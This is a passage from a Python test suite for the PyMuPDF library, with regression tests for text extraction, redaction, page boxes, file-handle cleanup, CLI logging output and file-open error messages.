print(f'test_2108(): repr(text.encode("utf8")) is:\n{text.encode("utf8")!r}')
print(f'')
print(f'test_2108(): text_expected is:\n{text_expected}')
print(f'')
print(f'test_2108(): repr(text_expected) is:\n{text_expected!r}')
print(f'')
print(f'test_2108(): repr(text_expected.encode("utf8")) is:\n{text_expected.encode("utf8")!r}')
ok1 = (text == text_expected)
ok2 = (text.encode("utf8") == text_expected.encode("utf8"))
ok3 = (repr(text.encode("utf8")) == repr(text_expected.encode("utf8")))
print(f'')
print(f'ok1={ok1}')
print(f'ok2={ok2}')
print(f'ok3={ok3}')
print(f'')
print(f'{pymupdf.mupdf_version_tuple=}')
if pymupdf.mupdf_version_tuple >= (1, 21, 2):
print('Asserting text==text_expected')
assert text == text_expected
else:
print('Asserting text!=text_expected')
assert text != text_expected
def test_2238():
filepath = f'{scriptdir}/resources/test2238.pdf'
doc = pymupdf.open(filepath)
rebased = hasattr(pymupdf, 'mupdf')
if rebased:
wt = pymupdf.TOOLS.mupdf_warnings()
assert wt == (
'format error: cannot recognize version marker\n'
'trying to repair broken xref\n'
'repairing PDF document'
), f'{wt=}'
first_page = doc.load_page(0).get_text('text', pymupdf.INFINITE_RECT())
last_page = doc.load_page(-1).get_text('text', pymupdf.INFINITE_RECT())
print(f'first_page={first_page!r}')
print(f'last_page={last_page!r}')
assert first_page == 'Hello World\n'
assert last_page == 'Hello World\n'
first_page = doc.load_page(0).get_text('text')
last_page = doc.load_page(-1).get_text('text')
print(f'first_page={first_page!r}')
print(f'last_page={last_page!r}')
assert first_page == 'Hello World\n'
assert last_page == 'Hello World\n'
def test_2093():
doc = pymupdf.open(f'{scriptdir}/resources/test2093.pdf')
def average_color(page):
pixmap = page.get_pixmap()
p_average = [0] * pixmap.n
for y in range(pixmap.height):
for x in range(pixmap.width):
p = pixmap.pixel(x, y)
for i in range(pixmap.n):
p_average[i] += p[i]
for i in range(pixmap.n):
p_average[i] /= (pixmap.height * pixmap.width)
return p_average
page = doc.load_page(0)
pixel_average_before = average_color(page)
rx=135.123
ry=123.56878
rw=69.8409
rh=9.46397
x0 = rx
y0 = ry
x1 = rx + rw
y1 = ry + rh
rect = pymupdf.Rect(x0, y0, x1, y1)
font = pymupdf.Font("Helvetica")
fill_color=(0,0,0)
page.add_redact_annot(
quad=rect,
#text="null",
fontname=font.name,
fontsize=12,
align=pymupdf.TEXT_ALIGN_CENTER,
fill=fill_color,
text_color=(1,1,1),
)
page.apply_redactions()
pixel_average_after = average_color(page)
print(f'pixel_average_before={pixel_average_before!r}')
print(f'pixel_average_after={pixel_average_after!r}')
# Before this bug was fixed (MuPDF-1.22):
# pixel_average_before=[130.864323120088, 115.23577810900859, 92.9268559996174]
# pixel_average_after=[138.68844553555772, 123.05687162237561, 100.74275056194105]
# After fix:
# pixel_average_before=[130.864323120088, 115.23577810900859, 92.9268559996174]
# pixel_average_after=[130.8889209934799, 115.25722751837269, 92.94327384463327]
#
for i in range(len(pixel_average_before)):
diff = pixel_average_before[i] - pixel_average_after[i]
assert abs(diff) < 0.1
out = f'{scriptdir}/resources/test2093-out.pdf'
doc.save(out)
print(f'Have written to: {out}')
def test_2182():
print(f'test_2182() started')
doc = pymupdf.open(f'{scriptdir}/resources/test2182.pdf')
page = doc[0]
for annot in page.annots():
print(annot)
print(f'test_2182() finished')
def test_2246():
"""
Test / confirm identical text positions generated by
* page.insert_text()
versus
* TextWriter.write_text()
... under varying situations as follows:
1. MediaBox does not start at (0, 0)
2. CropBox origin is different from that of MediaBox
3. Check for all 4 possible page rotations
The test writes the same text at the same positions using `page.insert_text()`,
respectively `TextWriter.write_text()`.
Then extracts the text spans and confirms that they all occupy the same bbox.
This ensures coincidence of text positions of page.of insert_text()
(which is assumed correct) and TextWriter.write_text().
"""
def bbox_count(rot):
"""Make a page and insert identical text via different methods.
Desired page rotation is a parameter. MediaBox and CropBox are chosen
to be "awkward": MediaBox does not start at (0,0) and CropBox is a
true subset of MediaBox.
"""
# bboxes of spans on page: same text positions are represented by ONE bbox
bboxes = set()
doc = pymupdf.open()
# prepare a page with desired MediaBox / CropBox peculiarities
mediabox = pymupdf.paper_rect("letter")
page = doc.new_page(width=mediabox.width, height=mediabox.height)
xref = page.xref
newmbox = list(map(float, doc.xref_get_key(xref, "MediaBox")[1][1:-1].split()))
newmbox = pymupdf.Rect(newmbox)
mbox = newmbox + (10, 20, 10, 20)
cbox = mbox + (10, 10, -10, -10)
doc.xref_set_key(xref, "MediaBox", "[%g %g %g %g]" % tuple(mbox))
doc.xref_set_key(xref, "CrobBox", "[%g %g %g %g]" % tuple(cbox))
# set page to desired rotation
page.set_rotation(rot)
page.insert_text((50, 50), "Text inserted at (50,50)")
tw = pymupdf.TextWriter(page.rect)
tw.append((50, 50), "Text inserted at (50,50)")
tw.write_text(page)
blocks = page.get_text("dict")["blocks"]
for b in blocks:
for l in b["lines"]:
for s in l["spans"]:
# store bbox rounded to 3 decimal places
bboxes.add(pymupdf.Rect(pymupdf.JM_TUPLE3(s["bbox"])))
return len(bboxes) # should be 1!
# the following tests must all pass
assert bbox_count(0) == 1
assert bbox_count(90) == 1
assert bbox_count(180) == 1
assert bbox_count(270) == 1
def test_2430():
"""Confirm that multiple font property checks will not destroy Py_None."""
font = pymupdf.Font("helv")
for i in range(1000):
_ = font.flags
def test_2692():
document = pymupdf.Document(f'{scriptdir}/resources/2.pdf')
for page in document:
pix = page.get_pixmap(clip=pymupdf.Rect(0,0,10,10))
dl = page.get_displaylist(annots=True)
pix = dl.get_pixmap(
matrix=pymupdf.Identity,
colorspace=pymupdf.csRGB,
alpha=False,
clip=pymupdf.Rect(0,0,10,10),
)
pix = dl.get_pixmap(
matrix=pymupdf.Identity,
#colorspace=pymupdf.csRGB,
alpha=False,
clip=pymupdf.Rect(0,0,10,10),
)
def test_2596():
"""Confirm correctly abandoning cache when reloading a page."""
doc = pymupdf.Document(f"{scriptdir}/resources/test_2596.pdf")
page = doc[0]
pix0 = page.get_pixmap() # render the page
_ = doc.tobytes(garbage=3) # save with garbage collection
# Note this will invalidate cache content for this page.
# Reloading the page now empties the cache, so rendering
# will deliver the same pixmap
page = doc.reload_page(page)
pix1 = page.get_pixmap()
assert pix1.samples == pix0.samples
rebased = hasattr(pymupdf, 'mupdf')
if rebased:
wt = pymupdf.TOOLS.mupdf_warnings()
assert wt == 'too many indirections (possible indirection cycle involving 24 0 R)'
def test_2730():
"""Ensure identical output across text extractions."""
doc = pymupdf.open(f"{scriptdir}/resources/test_2730.pdf")
page = doc[0]
s1 = set(page.get_text()) # plain text extraction
s2 = set(page.get_text(sort=True)) # uses "blocks" extraction
s3 = set(page.get_textbox(page.rect))
assert s1 == s2
assert s1 == s3
def test_2553():
"""Ensure identical output across text extractions."""
verbose = 0
doc = pymupdf.open(f"{scriptdir}/resources/test_2553.pdf")
page = doc[0]
# extract plain text, build set of all characters
list1 = page.get_text()
set1 = set(list1)
# extract text blocks, build set of all characters
list2 = page.get_text(sort=True) # internally uses "blocks"
set2 = set(list2)
# extract textbox content, build set of all characters
list3 = page.get_textbox(page.rect)
set3 = set(list3)
def show(l):
ret = f'len={len(l)}\n'
for c in l:
cc = ord(c)
if (cc >= 32 and cc < 127) or c == '\n':
ret += c
else:
ret += f' [0x{hex(cc)}]'
return ret
if verbose:
print(f'list1:\n{show(list1)}')
print(f'list2:\n{show(list2)}')
print(f'list3:\n{show(list3)}')
# all sets must be equal
assert set1 == set2
assert set1 == set3
# With mupdf later than 1.23.4, this special page contains no invalid
# Unicodes.
#
if pymupdf.mupdf_version_tuple > (1, 23, 4):
print(f'Checking no occurrence of 0xFFFD, {pymupdf.mupdf_version_tuple=}.')
assert chr(0xFFFD) not in set1
else:
print(f'Checking occurrence of 0xFFFD, {pymupdf.mupdf_version_tuple=}.')
assert chr(0xFFFD) in set1
def test_2553_2():
doc = pymupdf.open(f"{scriptdir}/resources/test_2553-2.pdf")
page = doc[0]
# extract plain text, ensure that there are no 0xFFFD characters
text = page.get_text()
if pymupdf.mupdf_version_tuple >= (1, 23, 7):
assert chr(0xfffd) not in text
else:
# Bug not fixed in MuPDF.
assert chr(0xfffd) in text
def test_2635():
"""Rendering a page before and after cleaning it should yield the same pixmap."""
doc = pymupdf.open(f"{scriptdir}/resources/test_2635.pdf")
page = doc[0]
pix1 = page.get_pixmap() # pixmap before cleaning
page.clean_contents() # clean page
pix2 = page.get_pixmap() # pixmap after cleaning
assert pix1.samples == pix2.samples # assert equality
def test_resolve_names():
"""Test PDF name resolution."""
# guard against wrong PyMuPDF architecture version
if not hasattr(pymupdf.Document, "resolve_names"):
print("PyMuPDF version does not support resolving PDF names")
return
pickle_in = open(f"{scriptdir}/resources/cython.pickle", "rb")
old_names = pickle.load(pickle_in)
doc = pymupdf.open(f"{scriptdir}/resources/cython.pdf")
new_names = doc.resolve_names()
assert new_names == old_names
def test_2777():
document = pymupdf.Document()
page = document.new_page()
print(page.mediabox.width)
def test_2710():
doc = pymupdf.open(f'{scriptdir}/resources/test_2710.pdf')
page = doc.load_page(0)
print(f'test_2710(): {page.cropbox=}')
print(f'test_2710(): {page.mediabox=}')
print(f'test_2710(): {page.rect=}')
def numbers_approx_eq(a, b):
return abs(a-b) < 0.001
def points_approx_eq(a, b):
return numbers_approx_eq(a.x, b.x) and numbers_approx_eq(a.y, b.y)
def rects_approx_eq(a, b):
return points_approx_eq(a.bottom_left, b.bottom_left) and points_approx_eq(a.top_right, b.top_right)
def assert_rects_approx_eq(a, b):
assert rects_approx_eq(a, b), f'Not nearly identical: {a=} {b=}'
blocks = page.get_text('blocks')
print(f'test_2710(): {blocks=}')
assert len(blocks) == 2
block = blocks[1]
rect = pymupdf.Rect(block[:4])
text = block[4]
print(f'test_2710(): {rect=}')
print(f'test_2710(): {text=}')
assert text == 'Text at left page border\n'
assert_rects_approx_eq(page.cropbox, pymupdf.Rect(30.0, 30.0, 565.3200073242188, 811.9199829101562))
assert_rects_approx_eq(page.mediabox, pymupdf.Rect(0.0, 0.0, 595.3200073242188, 841.9199829101562))
print(f'test_2710(): {pymupdf.mupdf_version_tuple=}')
if pymupdf.mupdf_version_tuple < (1, 23, 5):
print(f'test_2710(): Not Checking page.rect and rect.')
elif pymupdf.mupdf_version_tuple < (1, 24.0):
print(f'test_2710(): Checking page.rect and rect.')
assert_rects_approx_eq(page.rect, pymupdf.Rect(0.0, 0.0, 535.3200073242188, 781.9199829101562))
assert_rects_approx_eq(rect, pymupdf.Rect(0.7872352600097656, 64.7560043334961, 124.85531616210938, 78.1622543334961))
else:
# 2023-11-05: Currently broken in mupdf master.
print(f'test_2710(): Not Checking page.rect and rect.')
rebased = hasattr(pymupdf, 'mupdf')
if rebased:
wt = pymupdf.TOOLS.mupdf_warnings()
assert wt == (
"syntax error: cannot find ExtGState resource 'GS7'\n"
"syntax error: cannot find ExtGState resource 'GS8'\n"
"encountered syntax errors; page may not be correct"
)
def test_2736():
"""Check handling of CropBox changes vis-a-vis a MediaBox with
negative coordinates."""
doc = pymupdf.open()
page = doc.new_page()
# fake a MediaBox for demo purposes
doc.xref_set_key(page.xref, "MediaBox", "[-30 -20 595 842]")
assert page.cropbox == pymupdf.Rect(-30, 0, 595, 862)
assert page.rect == pymupdf.Rect(0, 0, 625, 862)
# change the CropBox: shift by (10, 10) in both dimensions. Please note:
# To achieve this, 10 must be subtracted from 862! yo must never be negative!
page.set_cropbox(pymupdf.Rect(-20, 0, 595, 852))
# get CropBox from the page definition
assert doc.xref_get_key(page.xref, "CropBox")[1] == "[-20 -10 595 842]"
assert page.rect == pymupdf.Rect(0, 0, 615, 852)
error = False
text = ""
try: # check error detection
page.set_cropbox((-35, -10, 595, 842))
except Exception as e:
text = str(e)
error = True
assert error == True
assert text == "CropBox not in MediaBox"
def test_subset_fonts():
"""Confirm subset_fonts is working."""
if not hasattr(pymupdf, "mupdf"):
print("Not testing 'test_subset_fonts' in classic.")
return
text = "Just some arbitrary text."
arch = pymupdf.Archive()
css = pymupdf.css_for_pymupdf_font("ubuntu", archive=arch)
css += "* {font-family: ubuntu;}"
doc = pymupdf.open()
page = doc.new_page()
page.insert_htmlbox(page.rect, text, css=css, archive=arch)
doc.subset_fonts(verbose=True)
found = False
for xref in range(1, doc.xref_length()):
if "+Ubuntu#20Regular" in doc.xref_object(xref):
found = True
break
assert found is True
def test_2957_1():
"""Text following a redaction must not change coordinates."""
# test file with redactions
doc = pymupdf.open(os.path.join(scriptdir, "resources", "test_2957_1.pdf"))
page = doc[0]
# search for string that must not move by redactions
rects0 = page.search_for("6e9f73dfb4384a2b8af6ebba")
# sort rectangles vertically
rects0 = sorted(rects0, key=lambda r: r.y1)
assert len(rects0) == 2 # must be 2 redactions
page.apply_redactions()
# reload page to finalize updates
page = doc.reload_page(page)
# the two string must retain their positions (except rounding errors)
rects1 = page.search_for("6e9f73dfb4384a2b8af6ebba")
rects1 = sorted(rects1, key=lambda r: r.y1)
assert page.first_annot is None # make sure annotations have disappeared
for i in range(2):
r0 = rects0[i].irect # take rounded rects
r1 = rects1[i].irect
assert r0 == r1
def test_2957_2():
"""Redacted text must not change positions of remaining text."""
doc = pymupdf.open(os.path.join(scriptdir, "resources", "test_2957_2.pdf"))
page = doc[0]
words0 = page.get_text("words") # all words before redacting
page.apply_redactions() # remove/redact the word "longer"
words1 = page.get_text("words") # extract words again
assert len(words1) == len(words0) - 1 # must be one word less
assert words0[3][4] == "longer" # just confirm test file is correct one
del words0[3] # remove the redacted word from first list
for i in range(len(words1)): # compare words
w1 = words1[i] # word after redaction
bbox1 = pymupdf.Rect(w1[:4]).irect # its IRect coordinates
w0 = words0[i] # word before redaction
bbox0 = pymupdf.Rect(w0[:4]).irect # its IRect coordinates
assert bbox0 == bbox1 # must be same coordinates
def test_707560():
"""https://bugs.ghostscript.com/show_bug.cgi?id=707560
Ensure that redactions also remove characters with an empty width bbox.
"""
# Make text that will contain characters with an empty bbox.
greetings = (
"Hello, World!", # english
"Hallo, Welt!", # german
"سلام دنیا!", # persian
"வணக்கம், உலகம்!", # tamil
"สวัสดีชาวโลก!", # thai
"Привіт Світ!", # ucranian
"שלום עולם!", # hebrew
"ওহে বিশ্ব!", # bengali
"你好世界!", # chinese
"こんにちは世界!", # japanese
"안녕하세요, 월드!", # korean
"नमस्कार, विश्व !", # sanskrit
"हैलो वर्ल्ड!", # hindi
)
text = " ... ".join([g for g in greetings])
where = (50, 50, 400, 500)
story = pymupdf.Story(text)
bio = io.BytesIO()
writer = pymupdf.DocumentWriter(bio)
more = True
while more:
dev = writer.begin_page(pymupdf.paper_rect("a4"))
more, _ = story.place(where)
story.draw(dev)
writer.end_page()
writer.close()
doc = pymupdf.open("pdf", bio)
page = doc[0]
text = page.get_text()
assert text, "Unexpected: test page has no text."
page.add_redact_annot(page.rect)
page.apply_redactions()
assert not page.get_text(), "Unexpected: text not fully redacted."
def test_3070():
with pymupdf.open(os.path.abspath(f'{__file__}/../../tests/resources/test_3070.pdf')) as pdf:
links = pdf[0].get_links()
links[0]['uri'] = "https://www.ddg.gg"
pdf[0].update_link(links[0])
pdf.save(os.path.abspath(f'{__file__}/../../tests/test_3070_out.pdf'))
def test_bboxlog_2885():
doc = pymupdf.open(os.path.abspath(f'{__file__}/../../tests/resources/test_2885.pdf'))
page=doc[0]
bbl = page.get_bboxlog()
if pymupdf.mupdf_version_tuple >= (1, 24, 9):
wt = pymupdf.TOOLS.mupdf_warnings()
assert wt == 'invalid marked content and clip nesting'
bbl = page.get_bboxlog(layers=True)
if pymupdf.mupdf_version_tuple >= (1, 24, 9):
wt = pymupdf.TOOLS.mupdf_warnings()
assert wt == 'invalid marked content and clip nesting'
def test_3081():
'''
Check Document.close() closes file handles, even if a Page instance exists.
'''
path1 = os.path.abspath(f'{__file__}/../../tests/resources/1.pdf')
path2 = os.path.abspath(f'{__file__}/../../tests/test_3081-2.pdf')
rebased = hasattr(pymupdf, 'mupdf')
import shutil
import sys
import traceback
shutil.copy2(path1, path2)
# Find next two available fds.
next_fd_1 = os.open(path2, os.O_RDONLY)
next_fd_2 = os.open(path2, os.O_RDONLY)
os.close(next_fd_1)
os.close(next_fd_2)
def next_fd():
fd = os.open(path2, os.O_RDONLY)
os.close(fd)
return fd
fd1 = next_fd()
document = pymupdf.open(path2)
page = document[0]
fd2 = next_fd()
document.close()
if rebased:
assert document.this is None
assert page.this is None
try:
document.page_count()
except Exception as e:
print(f'Received expected exception: {e}')
#traceback.print_exc(file=sys.stdout)
assert str(e) == 'document closed'
else:
assert 0, 'Did not receive expected exception.'
fd3 = next_fd()
try:
page.bound()
except Exception as e:
print(f'Received expected exception: {e}')
#traceback.print_exc(file=sys.stdout)
if rebased:
assert str(e) == 'page is None'
else:
assert str(e) == 'orphaned object: parent is None'
else:
assert 0, 'Did not receive expected exception.'
page = None
fd4 = next_fd()
print(f'{next_fd_1=} {next_fd_2=}')
print(f'{fd1=} {fd2=} {fd3=} {fd4=}')
print(f'{document=}')
assert fd1 == next_fd_1
assert fd2 == next_fd_2 # Checks document only uses one fd.
assert fd3 == next_fd_1 # Checks no leaked fds after document close.
assert fd4 == next_fd_1 # Checks no leaked fds after failed page access.
def test_xml():
path = os.path.abspath(f'{__file__}/../../tests/resources/2.pdf')
with pymupdf.open(path) as document:
document.get_xml_metadata()
def test_3112_set_xml_metadata():
document = pymupdf.Document()
document.set_xml_metadata('hello world')
def test_archive_3126():
if not hasattr(pymupdf, 'mupdf'):
print(f'Not running because known to fail with classic.')
return
p = os.path.abspath(f'{__file__}/../../tests/resources')
p = pathlib.Path(p)
archive = pymupdf.Archive(p)
def test_3140():
if not hasattr(pymupdf, 'mupdf'):
print(f'Not running test_3140 on classic, because Page.insert_htmlbox() not available.')
return
css2 = ''
path = os.path.abspath(f'{__file__}/../../tests/resources/2.pdf')
oldfile = os.path.abspath(f'{__file__}/../../tests/test_3140_old.pdf')
newfile = os.path.abspath(f'{__file__}/../../tests/test_3140_new.pdf')
import shutil
shutil.copy2(path, oldfile)
def next_fd():
fd = os.open(path, os.O_RDONLY)
os.close(fd)
return fd
fd1 = next_fd()
with pymupdf.open(oldfile) as doc: # open document
page = doc[0]
rect = pymupdf.Rect(130, 400, 430, 600)
CELLS = pymupdf.make_table(rect, cols=3, rows=5)
shape = page.new_shape() # create Shape
for i in range(5):
for j in range(3):
qtext = "<b>" + "Ques #" + str(i*3+j+1) + ": " + "</b>" # codespell:ignore
atext = "<b>" + "Ans:" + "</b>" # codespell:ignore
qtext = qtext + '<br>' + atext
shape.draw_rect(CELLS[i][j]) # draw rectangle
page.insert_htmlbox(CELLS[i][j], qtext, css=css2, scale_low=0)
shape.finish(width=2.5, color=pymupdf.pdfcolor["blue"], )
shape.commit() # write all stuff to the page
doc.subset_fonts()
doc.ez_save(newfile)
fd2 = next_fd()
assert fd2 == fd1, f'{fd1=} {fd2=}'
os.remove(oldfile)
def test_cli():
if not hasattr(pymupdf, 'mupdf'):
print('test_cli(): Not running on classic because of fitz_old.')
return
import subprocess
subprocess.run(f'pymupdf -h', shell=1, check=1)
def check_lines(expected_regexes, actual):
'''
Checks lines in <actual> match regexes in <expected_regexes>.
'''
print(f'check_lines():', flush=1)
print(f'{expected_regexes=}', flush=1)
print(f'{actual=}', flush=1)
def str_to_list(s):
if isinstance(s, str):
return s.split('\n') if s else list()
return s
expected_regexes = str_to_list(expected_regexes)
actual = str_to_list(actual)
if expected_regexes and expected_regexes[-1]:
expected_regexes.append('') # Always expect a trailing empty line.
# Remove `None` regexes and make all regexes match entire lines.
expected_regexes = [f'^{i}$' for i in expected_regexes if i is not None]
print(f'{expected_regexes=}', flush=1)
for expected_regex_line, actual_line in zip(expected_regexes, actual):
print(f' {expected_regex_line=}', flush=1)
print(f' {actual_line=}', flush=1)
assert re.match(expected_regex_line, actual_line)
assert len(expected_regexes) == len(actual), \
f'expected/actual lines mismatch: {len(expected_regexes)=} {len(actual)=}.'
def test_cli_out():
'''
Check redirection of messages and log diagnostics with environment
variables PYMUPDF_LOG and PYMUPDF_MESSAGE.
'''
if not hasattr(pymupdf, 'mupdf'):
print('test_cli(): Not running on classic because of fitz_old.')
return
import platform
import re
import subprocess
log_prefix = None
if os.environ.get('PYMUPDF_USE_EXTRA') == '0':
log_prefix = f'.+Using non-default setting from PYMUPDF_USE_EXTRA: \'0\''
def check(
expect_out,
expect_err,
message=None,
log=None,
verbose=0,
):
'''
Sets PYMUPDF_MESSAGE to `message` and PYMUPDF_LOG to `log`, runs
`pymupdf internal`, and checks lines stdout and stderr match regexes in
`expect_out` and `expect_err`. Note that we enclose regexes in `^...$`.
'''
env = dict()
if log:
env['PYMUPDF_LOG'] = log
if message:
env['PYMUPDF_MESSAGE'] = message
env = os.environ | env
print(f'Running with {env=}: pymupdf internal', flush=1)
cp = subprocess.run(f'pymupdf internal', shell=1, check=1, capture_output=1, env=env, text=True)
if verbose:
#print(f'{cp.stdout=}.', flush=1)
#print(f'{cp.stderr=}.', flush=1)
sys.stdout.write(f'stdout:\n{textwrap.indent(cp.stdout, " ")}')
sys.stdout.write(f'stderr:\n{textwrap.indent(cp.stderr, " ")}')
check_lines(expect_out, cp.stdout)
check_lines(expect_err, cp.stderr)
#
print(f'Checking default, all output to stdout.')
check(
[
log_prefix,
'This is from PyMuPDF message[(][)][.]',
'.+This is from PyMuPDF log[(][)].',
],
'',
)
#
if platform.system() != 'Windows':
print(f'Checking redirection of everything to /dev/null.')
check('', '', 'path:/dev/null', 'path:/dev/null')
#
print(f'Checking redirection to files.')
path_out = os.path.abspath(f'{__file__}/../../tests/test_cli_out.out')
path_err = os.path.abspath(f'{__file__}/../../tests/test_cli_out.err')
check('', '', f'path:{path_out}', f'path:{path_err}')
def read(path):
with open(path) as f:
return f.read()
out = read(path_out)
err = read(path_err)
check_lines(['This is from PyMuPDF message[(][)][.]'], out)
check_lines([log_prefix, '.+This is from PyMuPDF log[(][)][.]'], err)
#
print(f'Checking redirection to fds.')
check(
[
'This is from PyMuPDF message[(][)][.]',
],
[
log_prefix,
'.+This is from PyMuPDF log[(][)].',
],
'fd:1',
'fd:2',
)
def test_use_python_logging():
'''
Checks pymupdf.use_python_logging().
'''
log_prefix = None
if os.environ.get('PYMUPDF_USE_EXTRA') == '0':
log_prefix = f'.+Using non-default setting from PYMUPDF_USE_EXTRA: \'0\''
if os.path.basename(__file__).startswith(f'test_fitz_'):
# Do nothing, because command `pymupdf` outputs diagnostics containing
# `pymupdf` which are not renamed to `fitz`, which breaks our checking.
print(f'Not testing with fitz alias.')
return
def check(
code,
regexes_stdout,
regexes_stderr,
env = None,
):
code = textwrap.dedent(code)
path = os.path.abspath(f'{__file__}/../../tests/resources_test_logging.py')
with open(path, 'w') as f:
f.write(code)
command = f'{sys.executable} {path}'
if env:
print(f'{env=}.')
env = os.environ | env
print(f'Running: {command}', flush=1)
try:
cp = subprocess.run(command, shell=1, check=1, capture_output=1, text=True, env=env)
except Exception as e:
print(f'Command failed: {command}.', flush=1)
print(f'Stdout\n{textwrap.indent(e.stdout, " ")}', flush=1)
print(f'Stderr\n{textwrap.indent(e.stderr, " ")}', flush=1)
raise
check_lines(regexes_stdout, cp.stdout)
check_lines(regexes_stderr, cp.stderr)
print(f'## Basic use of `logging` sends output to stderr instead of default stdout.')
check(
'''
import pymupdf
pymupdf.message('this is pymupdf.message()')
pymupdf.log('this is pymupdf.log()')
pymupdf.set_messages(pylogging=1)
pymupdf.set_log(pylogging=1)
pymupdf.message('this is pymupdf.message() 2')
pymupdf.log('this is pymupdf.log() 2')
''',
[
log_prefix,
'this is pymupdf.message[(][)]',
'.+this is pymupdf.log[(][)]',
],
[
'this is pymupdf.message[(][)] 2',
'.+this is pymupdf.log[(][)] 2',
],
)
print(f'## Calling logging.basicConfig() makes logging output contain <LEVEL>:<name> prefixes.')
check(
'''
import pymupdf
import logging
logging.basicConfig()
pymupdf.set_messages(pylogging=1)
pymupdf.set_log(pylogging=1)
pymupdf.message('this is pymupdf.message()')
pymupdf.log('this is pymupdf.log()')
''',
[
log_prefix,
],
[
'WARNING:pymupdf:this is pymupdf.message[(][)]',
'WARNING:pymupdf:.+this is pymupdf.log[(][)]',
],
)
print(f'## Setting PYMUPDF_USE_PYTHON_LOGGING=1 makes PyMuPDF use logging on startup.')
check(
'''
import pymupdf
pymupdf.message('this is pymupdf.message()')
pymupdf.log('this is pymupdf.log()')
''',
'',
[
log_prefix,
'this is pymupdf.message[(][)]',
'.+this is pymupdf.log[(][)]',
],
env = dict(
PYMUPDF_MESSAGE='logging:',
PYMUPDF_LOG='logging:',
),
)
print(f'## Pass explicit logger to pymupdf.use_python_logging() with logging.basicConfig().')
check(
'''
import pymupdf
import logging
logging.basicConfig()
logger = logging.getLogger('foo')
pymupdf.set_messages(pylogging_logger=logger, pylogging_level=logging.WARNING)
pymupdf.set_log(pylogging_logger=logger, pylogging_level=logging.ERROR)
pymupdf.message('this is pymupdf.message()')
pymupdf.log('this is pymupdf.log()')
''',
[
log_prefix,
],
[
'WARNING:foo:this is pymupdf.message[(][)]',
'ERROR:foo:.+this is pymupdf.log[(][)]',
],
)
print(f'## Check pymupdf.set_messages() pylogging_level args.')
check(
'''
import pymupdf
import logging
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger('pymupdf')
pymupdf.set_messages(pylogging_level=logging.CRITICAL)
pymupdf.set_log(pylogging_level=logging.INFO)
pymupdf.message('this is pymupdf.message()')
pymupdf.log('this is pymupdf.log()')
''',
[
log_prefix,
],
[
'CRITICAL:pymupdf:this is pymupdf.message[(][)]',
'INFO:pymupdf:.+this is pymupdf.log[(][)]',
],
)
def relpath(path, start=None):
'''
A 'safe' alternative to os.path.relpath(). Avoids an exception on Windows
if the drive needs to change - in this case we use os.path.abspath().
'''
try:
return os.path.relpath(path, start)
except ValueError:
# os.path.relpath() fails if trying to change drives.
assert platform.system() == 'Windows'
return os.path.abspath(path)
def test_open():
if not hasattr(pymupdf, 'mupdf'):
print('test_open(): not running on classic.')
return
if pymupdf.mupdf_version_tuple < (1, 24):
print('test_open(): not running on mupdf < 1.24.')
return
import re
import textwrap
import traceback
resources = relpath(os.path.abspath(f'{__file__}/../../tests/resources'))
# We convert all strings to use `/` instead of os.sep, which avoids
# problems with regex's on windows.
resources = resources.replace(os.sep, '/')
def check(filename=None, stream=None, filetype=None, exception=None):
'''
Checks we receive expected exception if specified.
'''
if isinstance(filename, str):
filename = filename.replace(os.sep, '/')
if exception:
etype, eregex = exception
if isinstance(eregex, (tuple, list)):
# Treat as sequence of regexes to look for.
eregex = '.*'.join(eregex)
try:
pymupdf.open(filename=filename, stream=stream, filetype=filetype)
except etype as e:
text = traceback.format_exc(limit=0)
text = text.replace(os.sep, '/')
text = textwrap.indent(text, ' ', lambda line: 1)
assert re.search(eregex, text, re.DOTALL), \
f'Incorrect exception text, expected {eregex=}, received:\n{text}'
print(f'Received expected exception for {filename=} {stream=} {filetype=}:\n{text}')
except Exception as e:
assert 0, \
f'Incorrect exception, expected {etype}, received {type(e)=}.'
else:
assert 0, f'Did not received exception, expected {etype=}.'
else:
document = pymupdf.open(filename=filename, stream=stream, filetype=filetype)
return document
check(f'{resources}/1.pdf')
check(f'{resources}/Bezier.epub')
path = 1234
etype = TypeError
eregex = re.escape(f'bad filename: type(filename)=<class \'int\'> filename={path}.')
check(path, exception=(etype, eregex))
path = 'test_open-this-file-will-not-exist'
etype = pymupdf.FileNotFoundError
eregex = f'no such file: \'{path}\''
check(path, exception=(etype, eregex))
path = resources
etype = pymupdf.FileDataError
eregex = re.escape(f'\'{path}\' is no file')
check(path, exception=(etype, eregex))
path = relpath(os.path.abspath(f'{resources}/../test_open_empty'))
path = path.replace(os.sep, '/')
with open(path, 'w') as f:
pass
etype = pymupdf.EmptyFileError
eregex = re.escape(f'Cannot open empty file: filename={path!r}.')
check(path, exception=(etype, eregex))
path = f'{resources}/1.pdf'
filetype = 'xps'
etype = pymupdf.FileDataError
# 2023-12-12: On OpenBSD, for some reason the SWIG catch code only catches
# the exception as FzErrorBase.
etype2 = 'FzErrorBase' if platform.system() == 'OpenBSD' else 'FzErrorFormat'
eregex = (
# With a sysinstall with separate MuPDF install, we get
# `mupdf.FzErrorFormat` instead of `pymupdf.mupdf.FzErrorFormat`. So
# we just search for the former.
re.escape(f'mupdf.{etype2}: code=7: cannot recognize zip archive'),
re.escape(f'pymupdf.FileDataError: Failed to open file {path!r} as type {filetype!r}.'),
)
check(path, filetype=filetype, exception=(etype, eregex))
path = f'{resources}/chinese-tables.pickle'
etype = pymupdf.FileDataError
etype2 = 'FzErrorBase' if platform.system() == 'OpenBSD' else 'FzErrorUnsupported'
etext = (
re.escape(f'mupdf.{etype2}: code=6: cannot find document handler for file: {path}'),
re.escape(f'pymupdf.FileDataError: Failed to open file {path!r}.'),
)
check(path, exception=(etype, etext))
stream = 123
etype = TypeError
etext = re.escape('bad stream: type(stream)=<class \'int\'>.')
check(stream=stream, exception=(etype, etext))
check(stream=b'', exception=(pymupdf.EmptyFileError, re.escape('Cannot open empty stream.')))
def test_533():
if not hasattr(pymupdf, 'mupdf'):
print('test_533(): Not running on classic.')
return
path = os.path.abspath(f'{__file__}/../../tests/resources/2.pdf')
doc = pymupdf.open(path)
print()
for p in doc:
print(f'test_533(): for p in doc: {p=}.')
for p in list(doc)[:]:
print(f'test_533(): for p in list(doc)[:]: {p=}.')
for p in doc[:]:
print(f'test_533(): for p in doc[:]: {p=}.')
def test_3354():
document = pymupdf.open(filename)
v = dict(foo='bar')
document.metadata = v
assert document.metadata == v
def test_scientific_numbers():
'''
This is #3381.
'''
doc = pymupdf.open()
page = doc.new_page(width=595, height=842)
point = pymupdf.Point(1e-11, -1e-10)
page.insert_text(point, "Test")
contents = page.read_contents()
